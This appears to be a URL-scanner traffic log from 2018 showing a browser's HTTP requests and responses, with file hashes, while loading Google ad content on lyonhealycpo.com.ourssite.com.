Content-Encoding: gzip
Server: cafe
Content-Length: 29995
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 443545
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   29995
Md5:    ca42dee86b721494eb2a8c4f93c4508d
Sha1:   17ee6f68a61be238ce54d20d056a7a5834c52d80
Sha256: ea4ea916582c5f861acd268ab627997ac61a0a978dbeb3ff1685e0f0679a9ea5
                                        
                                            GET /pagead/html/r20180207/r20170110/zrt_lookup.html HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Timing-Allow-Origin: *
Date: Wed, 07 Feb 2018 20:56:39 GMT
Expires: Wed, 21 Feb 2018 20:56:39 GMT
Etag: 7893540961313292660
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Server: cafe
Content-Length: 6819
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 443547
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   6819
Md5:    8caea4ee531aab9f5d9328f80b7b23f3
Sha1:   3c1b05353b141a9e742555def5993bee1ec31ecd
Sha256: 0c3ec59d66f4780431ae46c09d53fe92c858ea2f05c6a5e02a17ab56d4428ff4
                                        
                                            GET /pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2327461989&adk=3265937839&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480545101&bpp=94&fdt=100&idt=258&shv=r20180207&cbv=r20170110&saldr=aa&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=2&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=138&ady=140&biw=1176&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=1&dtd=852 HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Tue, 13 Feb 2018 00:09:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Set-Cookie: test_cookie=CheckForPermission; expires=Tue, 13-Feb-2018 00:24:06 GMT; path=/; domain=.doubleclick.net
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Expires: Tue, 13 Feb 2018 00:09:06 GMT
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   370
Md5:    30cf2b6fac8b6b6ea37eafac04b00f77
Sha1:   9402615e120f21a602433baeca43ec8b735bb83d
Sha256: c6a1ebc48c5cc2484741f66a814f107158ea7ad8f8f37445ea7f2baa16d1381f
                                        
                                            GET /s2/favicons?domain_url=wollemaus.de HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:06 GMT
Date: Tue, 13 Feb 2018 00:09:06 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGB, non-interlaced
Size:   728
Md5:    2440ad3c4b28064eb94646ce3683102c
Sha1:   00e8ed361f598107d1d540e3c020d706eabcd754
Sha256: 18d109f2b4f1761fa20c39e5eca005caea8cd379d6edd665bc731b310d5d20be
                                        
                                            GET /pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385 HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Tue, 13 Feb 2018 00:09:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Set-Cookie: test_cookie=CheckForPermission; expires=Tue, 13-Feb-2018 00:24:06 GMT; path=/; domain=.doubleclick.net
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Expires: Tue, 13 Feb 2018 00:09:06 GMT
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   5263
Md5:    7be9290e8026fef6db96860e43f2631a
Sha1:   a45f8dc3347bfaf918ae577226dc37c8cd47923b
Sha256: 4534b27627653a65e8390a24e501b3aaf3acf6fe14eaf01a05084905295ae2cd
                                        
                                            GET /pagead/ads?client=ca-pub-2222385521793316&output=html&h=250&slotname=6757661585&adk=3336137519&adf=807048394&w=300&lmt=1518480535&loeid=38893312&format=300x250&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&avail_w=0&wgl=0&adsid=NT&dt=1518480546061&bpp=15&fdt=18&idt=118&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=138&ady=310&biw=1176&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=16&bc=1&ifi=2&dtd=135 HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Tue, 13 Feb 2018 00:09:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Set-Cookie: test_cookie=CheckForPermission; expires=Tue, 13-Feb-2018 00:24:06 GMT; path=/; domain=.doubleclick.net
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Expires: Tue, 13 Feb 2018 00:09:06 GMT
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   370
Md5:    fdc95fea4872d7dd4b9ae1e0cbadfe8a
Sha1:   eb946fa1823bce2092d6161b8312fa9238dfad18
Sha256: 92cfdf855f5d7585d2b06f0e27b6c4a8edab774236dfde6bc08b5c871064dd09
                                        
                                            GET /pagead/gen_204?id=xbid&dbm_b=AKAmf-AfuO6QeUwCK8b2EUwz_AFKyafw7LFzfGNSOMHZGjiiReXvZinLVSkB_SnAeDtKZaHhYuvn0R_GiQ-dePnhdahZCe0F2NjuJQxWjhlzX2qrn5rnnMk HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Tue, 13 Feb 2018 00:09:07 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /xbbe/pixel?d=COD5IRDn0jYY0IC5CDAB&v=APEucNWlf2nVGD7QVqn66Y9lRVBTes5IRW2ASGQmTA-x3cafgloPSVroOCiqfOxveidCWavRsq4O HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385
Cookie: test_cookie=CheckForPermission

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Tue, 13 Feb 2018 00:09:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Mon, 21 Jul 2008 23:59:00 GMT IDE=AHWqTUk3Zb48UxGj_Y6vxFZL3xULrhsxEct8XVZHqAWEGVSQzA9nVOXYFfBfwiDZ; expires=Thu, 13-Feb-2020 00:09:07 GMT; path=/; domain=.doubleclick.net; HttpOnly
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Expires: Tue, 13 Feb 2018 00:09:07 GMT
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   214
Md5:    02247d909a831178bfbddac723940ebd
Sha1:   9d29a593fe8e22024b5091691df54e3a02a3ba82
Sha256: 48647fe897d3f952a9ad4422e05ed61869c9bf0d2108a78bd2eba0f5eed26446
                                        
                                            GET /dbm/ad?dbm_c=AKAmf-Bh9Z_Q3rjY2VyR7p1ZAf3osR3l3pBgb6tNpp_XHhq2PWu3Q8nla_c4Dh8hWfzi6O-sHyq3&dbm_d=AKAmf-BFNOga-jp5GGXBLvIbNhP1IW1aZyvbgz5PkOO_XD5bIX6cmcX_zPfhQOx6AvXcaPS06DAyclKggRT7pn12EK0HlijTOqnnA_xrfIy73cbwTtZxY94ieU4xiNIxu2RrrMGR_XrneIMl_wvkbBtFLLd3peij8KnvoB9gNSnMHcZObe_Yj7TsoJs3eCT8Qp3tdrfn6Vj0vFLKl5T2SNRAAg5Im0bHRwkYiIjD_WLBZzPuWalViB226l7i9L_a8KwAc7fOEeInRAsm6qYtoH4I_T3SGzNlCD7XjUDS_Mqey48KaocFHZmxnWlKl8L2DIBagZJhFSWGrW8RNqh84zdEo8K-yGgC2usgr6gU-lK0xccw1LADcWWFFSevuHlBwCzY_EjU_99a390x7Zn9jq-tXBKXKjhu0MdAF4mPf-DH-4rWz6BEEFjNlvWUFaPDmx5uq1vdEVaCL3UZ5M9KAWWvZG04yoG4Zmm2YT8TEw1Ab-KLaOOjsh2i6DxFL9QQE7zBeFXoVMUy4Y5KJE9xhLewoPBJAaq2-_7LNUFBq8Z5Xyc6QgYAfS_MuPpd8DFZnIY4FMwVXYGXkPyZLEL9H4O3-Q3eJkDkeTpOkJpicEV3K9FETnI5rG7cVGbUjE_2MWZRprxcYdt85GlTARbTlJZnTc0SceG8HPyYAOwiE-nH8WoBswAXk3yRHiB4blgJuFTtuLylPp1aM3Kgerp0QEUs-U9_K-oV1KxQE-04CDK5v8sCuPxRCDbyOu0UFwPHvRRS8LbSestdaAy-HFqmVV49K1E-jtZj0UKjUOXtNGLzESTVmFzVSEpJFURDRAV9xccQ0I28orxLoEOTQ-M9I_7uLN7VXIDCFj6KMY5wnpwoMDtFit0XsSgpEDYK-DTq2fKwJvNzgGBOVw4Pk41cnG7lvqrxtNqenxeyxlB1j7rDlfUzIlpWfmjown-hWmqFU3rBkyXaV6zNO3MVcFtOXqbMLmxJGJL-KcD7gDOfXgnHCh7Lpe3dYbBhotgOypkbNXeZm7MN0Zrx555VDGOm9iUEibNpyEPGctt6SEtCGoHxejqpqpUsJFpCsZ762Mh_3-ngvlzEQCFQK0W4Ifm_umvh0qTVH_m0O1Po6cTOyjh-Lq5d0dAMW5mn5gStjir4XG_lfGaqCr6446NnMm3IVG2LqK5Prdc9BoCJBzTY-TOqGmj_XuvqaxEzMmWpRtrttOUb31RbKgZDmIxGMprywNiZ7oXTd_5QWZqTY4N9p7-4yPm4IaxrK7h_W23c8yPaMUV4PSWDF2fQWbgOGFAPfeaTroKCSURWGq34TCb_0c9X5RAOZD1rmgJ1FUv1ylDoSMgRrcsH7D4EJ1j_17qQHX4ObRnGxsxp_cxJNoCpWCX5F5Z7UFBNmtfuvzoAnRePC_DNuazVe3cpXzcsFN9Vjp4EOnJVFy-AEXMA5wK9eqbAlLTaYMK47yL2LLEFHePN29m3GC4lJy1CKh6uw-H70IirYZfg-X_mKbNGchKORiA-6LlRlGn_CdzaCtos1Ys0eB_PLpB8k99jI04iyUIZy_jBYhXE0NJa0wnpbAfimKMXbvLymtbvR3IfrxHwv-9T_oFB8yU3amZ3&cid=CAASBORoBGo&rfl=3%2C%2Chttp%253A%252F%252Flyonhealycpo.com.ourssite.com%252F%240 HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385
Cookie: test_cookie=CheckForPermission

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Timing-Allow-Origin: *
Date: Tue, 13 Feb 2018 00:09:07 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
X-XSS-Protection: 1; mode=block
Set-Cookie: IDE=AHWqTUn3lF26de1_opJkTXr8zjib-QFQ1axrFncjdAYl-qW3PRFGHfrioGgj-omi; expires=Thu, 13-Feb-2020 00:09:07 GMT; path=/; domain=.doubleclick.net; HttpOnly test_cookie=; domain=.doubleclick.net; path=/; expires=Mon, 21 Jul 2008 23:59:00 GMT
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   10773
Md5:    ed314287034679020031ff799527785b
Sha1:   fd0ab5761b4f22490a4bde6f312cfd8d00dc1a73
Sha256: 083a9f6bef9f8d7d44cc17cce3bb99ff32379fd133ead7670ca62f5c9d1b8121
                                        
                                            GET /pagead/js/r20180207/r20110914/abg.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Mon, 12 Feb 2018 17:08:57 GMT
Expires: Mon, 26 Feb 2018 17:08:57 GMT
Etag: 1003077525306946769
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 21796
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 25210
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   21796
Md5:    9c7168207979b5f6ab6777d97a8a0963
Sha1:   9cf64cc271ecf30cfd8043002730eae9b47c2bf8
